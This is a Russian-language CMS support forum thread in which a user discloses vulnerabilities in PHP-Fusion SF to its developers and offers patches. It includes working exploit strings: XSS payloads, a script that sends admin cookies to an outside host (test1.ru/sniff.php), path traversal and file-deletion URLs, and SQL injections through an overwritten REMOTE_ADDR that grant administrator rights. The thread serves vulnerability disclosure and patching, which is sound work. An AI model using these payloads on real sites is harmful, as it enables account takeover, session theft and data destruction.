Регистрация    Забыли пароль?        Правила форума    FAQ (читать перед созданием новой темы)
Имя   Пароль  запомнить
  
Просмотр темы
Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Система Управлением Сайта | Ошибки / Bugs Reports
# 1 Тема: Ряд уязвимостей
Дмитрий
Пользователь

Avatar пользователя




новичек

Сообщений: 6
Зарегистрирован: 08 Мая 2007, 16:00:30
Сказали спасибо 0 раз
Статус: offline
Опубликовано 08 Мая 2007, 16:42:36
Лазил я по вашим исходникам (не по всем, я пропустил форум и некоторые скрипты админки- не могу уже тошнит от них)... вот краткий список уязвимостей:

1) XSS в переменной title в скрипте subheader.php
Да я согласен все параметры передаваяемые методом ГЕТ фильтруются но эти фильтры легко обойти, вот так(собственно это можно назвать эксплоитом :):
http://site/?title=XSS</title><body onload=javascri%26%23%31%31%32%26%23%31%31%36:alert%26%23%34%30'xss'%26%23%34%31>/code]
Уязвимый код:
[code]...
echo "<title>".$title.$settings['sitename']."</title>
...


Переменная title не фильтруется никак...

2) XSS в переменной loginerror в скрипте ser_info_panel\user_info_panel.php
Эксплоит:
http://site/?loginerror=<img%20src=javascri%26%23%31%31%32%26%23%31%31%36:alert%26%23%34%30'xss'%26%23%34%31%20w
idth=1>


Уязвимый код:
...
echo "<div align='center'>".(isset($loginerror) ? $loginerror : "")."
...


Опять же отсутствие фильтрации :(

3) Трудно определить к какой либо категрии третью уязвимость, да и можно ли вообще это назвать уязвимостью, но таким способом украсть куки легче всего...
Если загрузить фотографию ("Добавить фотографию") на какойто сайт то, в админ панели пояаляется ссылка "Нажмите сюда чтобы просмотреть фотографию" Всебы хорошо если загружается нормальная фотография, но не задавались ли вы таким вопросом что будет при просмотре фотогорафии админом с содержнием:
<img src=002.gif name='img_flag2'>
<script>document.images['img_flag2'].src=('http://test1.ru/sniff.php?c='+document.cookie)</script>


Вот вам почва к размышлению...

4)Здесь я объеденю корявости в админ панели (пускай требуются права администратора и рядом есть модуль "Панели" дающий выполнение любого php, кода кстати тоже очень опасно!, но все же...)
Рассмотрим скрипт image.php, опасный код в нем:
if ($ifolder == "images") { $afolder = IMAGES; }
elseif ($ifolder == "imagesn") { $afolder = IMAGES_N; }
elseif ($ifolder == "imagesnc") { $afolder = IMAGES_NC; }
elseif ($ifolder == "imagesa") { $afolder = IMAGES_A; }


Вроде бы все нормально, но что будет если переменной ifolder передать другое значение не предусмотренное в "ифах", тогда мы сможем присвоить переменной afolder любое значение, что приводит к просмотру листинга файлов на сервере и загрузке картинки в любой каталог(мелочь но все равно приятно) соответсвенно эксплоиты:
http://site/administration/images.php?ifolder=bla-bla-bla&afolder=../


<form name='uploadform' method='post' action='http://site/administration/images.php?&ifolder=bla-bla-bla&afolder=../&uploadimage=bla-bla-bla' enctype='multipart/form-data'>
<input type='file' name='myfile'>
<input type='submit' value='Загрузить картинку'>
</form>


И еще удаление любого каталога
Уязвимый код:
...
if (isset($del)) {
unlink($afolder."$del");
...


Эксплоит:
http://site/administration/images.php?del=../index.php




Ко всему указанному выше пока выпустил неофициальные заплатки смотреть в аттаче или здесь http://www.novor.info/patch_for_fusion.rar надеюсь разроботчики поспешат решить эти проблемы... :)

Теперь пожелания:

1) Приделайте картинку с подтверждением в "Обратная связь".
2) Также картинку с подтверждением и для зарегистрированных пользователей в Гостевой.

Остается похвалить разроботчиков, неплохая CMS, почти не уязвимая :), честно говоря был удивлен когда нашел эти уязвимости...
Прикрепленные файлы
Для просмотра вложения зарегистрируйтесь
 
^ наверх ^
# 2  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 08 Мая 2007, 16:59:42
5+


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 3  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 08 Мая 2007, 17:02:23
Так же попрошу принять во внимание, что это модифицированная версия данной cms и мы были бы Вам благодарны, если Вы найдете еще уязвимостей!


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 4  
Дмитрий
Пользователь

Avatar пользователя




новичек

Сообщений: 6
Зарегистрирован: 08 Мая 2007, 16:00:30
Сказали спасибо 0 раз
Статус: offline
Опубликовано 09 Июля 2007, 22:24:07
мда в новой версии дырок я пока не нашел smiley


[Изменил(а) Дмитрий, 09 Июля 2007, 22:28:02]  
^ наверх ^
# 5  
Tr0y
Пользователь

Avatar пользователя


ШИКАРНЫЙ

Местный

Сообщений: 12
Откуда: Crimea
Зарегистрирован: 27 Июля 2007, 12:35:32
Сказали спасибо 0 раз
Статус: offline
ICQ статус 472618
Опубликовано 29 Июля 2007, 12:40:53
поиск никто не проверял?
 
^ наверх ^ 472618 http://hh-team.ru
# 6  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 29 Июля 2007, 13:33:10
а что там?


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 7  
Дмитрий
Пользователь

Avatar пользователя




новичек

Сообщений: 6
Зарегистрирован: 08 Мая 2007, 16:00:30
Сказали спасибо 0 раз
Статус: offline
Опубликовано 24 Августа 2007, 21:52:50
мда в новой версии дырок я пока не нашел

Ну вообщем неправда. Решил я допроверять админку на баги. Нашел одну багу вот она:

1) http://site/administration/attachments_forum.php?delattach=1&post_id=1&delattach=1&download_id=' скуль иньекция требуются права админа.

Дальше залез в файл maincore.php и сразу забыл об админке напрочь и дальше искать не стал. Собсно говоря первое что бросается в глаза это строка:
if (eregi("maincore.php", $_SERVER['PHP_SELF'])) die();


Вроде бы как положенно должно выкидывать если скрипт вызывается напрямую что то типа http://site/maincore.php но многие сервера разрешают обращение к файлам не указывая расширение. То есть вот так http://site/maincore Создается ощущение что это сделанно специально. Ну да ладно.

Следуйщие строки меня убили напрочь, даже не знаю как их раньше не заметил...
// If register_globals is turned off, extract super globals (php 4.2.0+)
if (ini_get('register_globals') != 1) {
if ((isset($_POST) == true) && (is_array($_POST) == true)) extract($_POST, EXTR_OVERWRITE);
if ((isset($_GET) == true) && (is_array($_GET) == true)) extract($_GET, EXTR_OVERWRITE);
}


Если кто то скажет что тут все нормально то он будет как минимум неправ. Смотрим что будет если register_globals отключен. Тогда все пременные извлекаются из масивов GET и POST в глобальные. Что тут не так? А вот что. Если попробовть перезаписать масивы _SERVER, _SESSION, _FILES то можно добиться интресных результатов. (К сожалению тут имеет смысл перезаписывать только массив _SERVER).И к сожалению все ниже приведенные интресности работают при отключенном(!) register_globals.

1) Собсно самое незначительное это обход бана по ip вот так http://site/index.php?_SERVER[REMOTE_ADDR]=123.123.123.123

2) http://site/maincore?_SERVER[REMOTE_ADDR]=1' UNION SELECT 1/* -скуль иньекция.
Уязвима строка 312 в файле maincore.php.

3) http://site/index.php?_SERVER[REMOTE_ADDR]=<script>alert()</script> -XSS+раскрытие пути. Требуется отсутствие прав пользователя!.
Уязвимы строчки 97 и 98 в файле infusions/user_info_panel/user_info_panel.php

4)(!) Создание пользователя с администраторскими привилегиями. Нужно при регистрации пользователя присвоить _SERVER[REMOTE_ADDR] значение 127.0.0.1', 'A.AC.AD.B.C.CP.DB.DC.D.FQ.F.IM.I.IP.M.N.NC.P.PH.PI.PO.S.SL.S1.S2.S3.S4.S5.S6.S7.SU.UG.U.W.WC.GS.GB', '', '103', '0') /* d. И затем войти под созданным пользователем. См. эксплоит 1.

5)(!) http://site/index.php?_SERVER[REMOTE_ADDR]=123' -скуль иньекция. Оригинальный запрос к базе выглядит вот так
UPDATE fusion_users SET user_lastvisit='time', user_ip='[injection]' WHERE user_id='[you_id]'

Это дает возможность изменять значения в таблице юзеров. Эксплоит для получения прав администратора выглядит так http://site/index.php?_SERVER[REMOTE_ADDR]=123', user_level='103' WHERE user_id=[you_id] /* Требуются права любого пользователя.
Файл subheader.php строка 34.

6) http://site/index.php?_SERVER[REMOTE_ADDR]=' -скуль иньекция. Требуются отсутствие прав пользователя!.
Файл infusions/online_users_panel/online_users_panel.php строки 19 и 20.

Конечно я думаю тут можно нарыть на основе этого дырок 10. Но дальше я искать не стал...

Латаются эти дырки довольно просто. Лезем в файл maincore.php ищем строку 220
define("USER_IP", $_SERVER['REMOTE_ADDR']);

и меняем ее на
define("USER_IP", stripinput($_SERVER['REMOTE_ADDR']));

Только это на время. Это как было написанно в какой-то книге "Мы латаем дыры в корабле, когда он сам разваливается попалам" вроде так :). Надеюсь авторы найдут порядочную замену функции extract.

Надеюсь это последнее сообщение о найденных багах...


[Изменил(а) Дмитрий, 24 Августа 2007, 22:51:08]  
^ наверх ^
# 8  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 25 Августа 2007, 12:00:58
гг


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 9  
Дмитрий
Пользователь

Avatar пользователя




новичек

Сообщений: 6
Зарегистрирован: 08 Мая 2007, 16:00:30
Сказали спасибо 0 раз
Статус: offline
Опубликовано 25 Августа 2007, 17:30:25
Хм...
 
^ наверх ^
# 10  
skorpion
Пользователь

Avatar пользователя

пожизненный катарсис

Любитель Fusion

Сообщений: 230
Откуда: Москва
Зарегистрирован: 19 Апреля 2007, 19:55:07
Сказали спасибо 12 раз
Статус: offline
Опубликовано 25 Августа 2007, 23:16:03
Дмитрий написал:
Хм...

smileysmileysmiley Я в шоке. smileysmileysmiley


--------------------
(с) Деньги это способ иметь мир, а мир имеет нас через деньги.
Жизнь - это очередная форма неуверенности...
Где меня найти:

http://ssfera.ru
http://www.rus-phpfusion.com
^ наверх ^ http://ssfera.ru
# 11  
Дмитрий
Пользователь

Avatar пользователя




новичек

Сообщений: 6
Зарегистрирован: 08 Мая 2007, 16:00:30
Сказали спасибо 0 раз
Статус: offline
Опубликовано 01 Сентября 2007, 11:02:29
И снова здрасте...

Теперь под рассмотрение попал файл search.php

уязвимый код:

if (!isset($method)) $method = isset($_POST['method']) ? (($_POST['method']=="OR" || $_POST['method']=="AND") ? $_POST['method'] : "OR") : "OR";
if (!isset($datelimit)) $datelimit = isset($_POST['datelimit']) ? (isNum($_POST['datelimit']) ? $_POST['datelimit'] : 0) : 0;
if (!isset($fields)) $fields = isset($_POST['fields']) ? (isNum($_POST['fields']) ? $_POST['fields'] : 2) : 2;
if (!isset($sort)) $sort = isset($_POST['sort']) ? (($_POST['sort']=="datestamp" || $_POST['sort']=="subject" || $_POST['sort']=="author") ? $_POST['sort'] : "datestamp") : "datestamp";
if (!isset($order)) $order = isset($_POST['order']) ? (isNum($_POST['order']) ? $_POST['order'] : 0) : 0;
if (!isset($chars)) $chars = isset($_POST['chars']) ? (isNum($_POST['chars']) ? $_POST['chars'] : 200) : 200;
if($forum_enabled == '1'){
if (!isset($forum_id)) $forum_id = isset($_POST['forum_id']) ? (isNum($_POST['forum_id']) ? $_POST['forum_id'] : 0) : 0;
};



Вообщем даже и не объяснишь сходу что он делает. Даже собственно говоря ничего она и не делает. Просто не бывает такого случая чтобы перменная допустим $method была не определенна а переменная $_POST['method'] была определенна (вспомним функцию extract ;) ). То есть $method никогда не проходит фильтрацию. Затем выполняется такой код:

$composevars = "method=$method&datelimit=$datelimit&fields=$fields&sort=$sort&order=$order&chars=$chars&forum_id=$forum_id&";


что собственно говоря и приводит к множественным XSS типа:
http://site/search.php?forum_id=
http://site/search.php?chars=

и тд

ну а код подобного рода
for ($i=0;$i<sizeof($swords);$i++) {
$ssubject .= "article_subject LIKE '%".$swords[$i]."%'".($i<sizeof($swords)-1?" ".$method." ":"");
$smessage .= "article_article LIKE '%".$swords[$i]."%'".($i<sizeof($swords)-1?" ".$method." ":"");
}

if ($fields==0) {
$fieldsvar = "(".$ssubject.")";
} else if ($fields==1) {
$fieldsvar = "(".$smessage.")";
} else if ($fields==2) {
$fieldsvar = "((".$ssubject.") || (".$smessage."))";
}
$result = dbquery(
"SELECT ta.*,tac.* FROM ".$db_prefix."articles ta
INNER JOIN ".$db_prefix."article_cats tac ON ta.article_cat=tac.article_cat_id
WHERE ".groupaccess('article_cat_access').
(multilang_table("A")?"AND tac.article_cat_language='".LANGUAGE."'":"").
" AND ".$fieldsvar
);



Приводит к SQL injection в переменной $method.
http://site/search.php?stext=ыыы+ввв&search=Искать&forum_id=0&stype=all&datelimit=0&fields=2&sort=datestamp&order=0&chars=200&method
=[SQL code]


Латается это все просто лезем в файл search.php. Ищем вот это:


if (!isset($method)) $method = isset($_POST['method']) ? (($_POST['method']=="OR" || $_POST['method']=="AND") ? $_POST['method'] : "OR") : "OR";
if (!isset($datelimit)) $datelimit = isset($_POST['datelimit']) ? (isNum($_POST['datelimit']) ? $_POST['datelimit'] : 0) : 0;
if (!isset($fields)) $fields = isset($_POST['fields']) ? (isNum($_POST['fields']) ? $_POST['fields'] : 2) : 2;
if (!isset($sort)) $sort = isset($_POST['sort']) ? (($_POST['sort']=="datestamp" || $_POST['sort']=="subject" || $_POST['sort']=="author") ? $_POST['sort'] : "datestamp") : "datestamp";
if (!isset($order)) $order = isset($_POST['order']) ? (isNum($_POST['order']) ? $_POST['order'] : 0) : 0;
if (!isset($chars)) $chars = isset($_POST['chars']) ? (isNum($_POST['chars']) ? $_POST['chars'] : 200) : 200;
if($forum_enabled == '1'){
if (!isset($forum_id)) $forum_id = isset($_POST['forum_id']) ? (isNum($_POST['forum_id']) ? $_POST['forum_id'] : 0) : 0;
};



и меняем на вот это:
if (isset($method)) $method = ($method=="OR" || $method=="AND") ? $method : "OR";
else $method = 'OR';
if (isset($datelimit)) $datelimit = isNum($datelimit) ? $datelimit : 0;
else $datelimit = 0;
if (isset($fields)) $fields = isNum($fields) ? $fields : 2;
else $fields = 2;
if (isset($sort)) $sort =($sort=="datestamp" || $sort=="subject" || $sort=="author") ? $sort : "datestamp";
else $sort = "datestamp";
if (isset($order)) $order = isNum($order) ? $order : 0;
else $order = 0;
if (isset($chars)) $chars = isNum($chars]) ? $chars : 200;
else $chars = 200;
if($forum_enabled == '1'){
if (isset($forum_id)) $forum_id = isNum($forum_id ) ? $forum_id : 0;
else $forum_id = 0;




[Изменил(а) Дмитрий, 07 Октября 2007, 17:31:54]  
^ наверх ^
# 12  
pozitiv
SF Team

Avatar пользователя

паZитифф

SF Support Team

Почетный SF

Сообщений: 1676
Откуда: Киев
Зарегистрирован: 18 Ноября 2007, 18:49:13
Сказали спасибо 148 раз
Статус: offline
ICQ статус 3902393
Опубликовано 20 Ноября 2007, 21:23:27
ну что...дыры залатали?))))


--------------------
wmz - Z226856101527
wmr - R513979829437

Все вопросы задавать на форуме. На вопросы заданные в приват или асю неотвечаю!
^ наверх ^ 3902393 http://nekto.me
# 13  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 21 Ноября 2007, 13:06:09
ну вроде да! smiley


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 14  
Дмитрий
Пользователь

Avatar пользователя




новичек

Сообщений: 6
Зарегистрирован: 08 Мая 2007, 16:00:30
Сказали спасибо 0 раз
Статус: offline
Опубликовано 23 Ноября 2007, 13:36:01
pozitiv написал:
ну что...дыры залатали?))))

те залатали-нашлись новые: круговорот багов в системе...

XSS в файле administration/settings_links.php переменная $aidlink не фильтруется. Эксплоит:
http://site/administration/settings_links.php?aidlink='><script>alert(document.cookie)</script>
PS для выполнения НЕ требуются права администратора, как может показаться...

Латается очень просто:
Открывается файл administration/settings_links.php и в начало вписывается:
if (!defined("IN_FUSION")) { header("location: ../index.php"); exit; }



[Изменил(а) Дмитрий, 23 Ноября 2007, 13:37:30]  
^ наверх ^
# 15  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 23 Ноября 2007, 18:29:15
Дмитрий написал:
pozitiv написал:
ну что...дыры залатали?))))

те залатали-нашлись новые: круговорот багов в системе...

XSS в файле administration/settings_links.php переменная $aidlink не фильтруется. Эксплоит:
http://site/administration/settings_links.php?aidlink='><script>alert(document.cookie)</script>
PS для выполнения НЕ требуются права администратора, как может показаться...

Латается очень просто:
Открывается файл administration/settings_links.php и в начало вписывается:
if (!defined("IN_FUSION"smiley) { header("location: ../index.php"smiley; exit; }



А в сборке это исправленно?


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 16  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 23 Ноября 2007, 18:31:24
<a href="http://www.xap.ru/?p=119582073" target="_blank">Выгодная партнерская программа WWW.XAP.RU</a>

Почему ссылка не отображается?
У меня на сайте тожеsmiley


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 17  
pozitiv
SF Team

Avatar пользователя

паZитифф

SF Support Team

Почетный SF

Сообщений: 1676
Откуда: Киев
Зарегистрирован: 18 Ноября 2007, 18:49:13
Сказали спасибо 148 раз
Статус: offline
ICQ статус 3902393
Опубликовано 23 Ноября 2007, 23:22:26
Выгодная партнерская программа WWW.XAP.RU


делай так:
[ url =http://www.xap.ru/?p=119582073 ]Выгодная партнерская программа WWW.XAP.RU[ / url ]


[Изменил(а) Sky, 24 Ноября 2007, 09:56:00]

--------------------
wmz - Z226856101527
wmr - R513979829437

Все вопросы задавать на форуме. На вопросы заданные в приват или асю неотвечаю!
^ наверх ^ 3902393 http://nekto.me
# 18  
crzyOH
Пользователь

Avatar пользователя



новичек

Сообщений: 3
Зарегистрирован: 04 Марта 2008, 00:18:22
Сказали спасибо 0 раз
Статус: offline
Опубликовано 25 Апреля 2008, 03:56:53
Вот тут - http://forum.prologic.ws/index.php?showtopic=3569 сегодня наткнулся на описание критической ошибки и эксплойт под нее


[Изменил(а) crzyOH, 25 Апреля 2008, 04:00:37]  
^ наверх ^
# 19  
Mik
SF Team

Avatar пользователя

Джедай

SF Support Team

Любитель Fusion

Сообщений: 390
Зарегистрирован: 03 Октября 2007, 11:14:57
Сказали спасибо 80 раз
Статус: offline
Опубликовано 25 Апреля 2008, 06:31:55
Сплойт для версии v6.00.3**, да и [:|||:] к тому же :)


--------------------
PHP Скрипты на заказ [MySQL, JS, Ajax, HTML, CSS]
^ наверх ^
# 20  
yury
Пользователь

Avatar пользователя

Магистр Дизайна и Верстки

Почетный SF

Сообщений: 1201
Зарегистрирован: 11 Января 2008, 15:57:19
Сказали спасибо 37 раз
Статус: offline
ICQ статус 371635405
Опубликовано 25 Апреля 2008, 09:26:11
Дамс, дырочек дстаточноsmiley А все исправили?

Кстати, никто гостевую не смотрел? ТАм видимо тоже чтото не так, т.к у меня на сайте при заходе в гостевую в форме ввода постоянно какой то адрес прописан непонятный на месте адреса сайта. Откуда он там может браться???

А fix pack еще не вышел???smiley


[Изменил(а) yury, 25 Апреля 2008, 09:45:18]

--------------------
Нужен сайт или красивый оригинальный дизайн?
Только лучший и оригинальный дизайн для php-fusion 6, 7, SF!
www.artcell.ru-правильный выбор!!!
^ наверх ^ 371635405 www.artcell.ru
Перейти на форум:


105,570,806 уникальных посетителей
сейчас: 24 Ноября 2024, 16:14:07
Генерация страницы: 0.52 сек.

Original size:67 кб.
GZipped size: 14 кб.
Compression:79%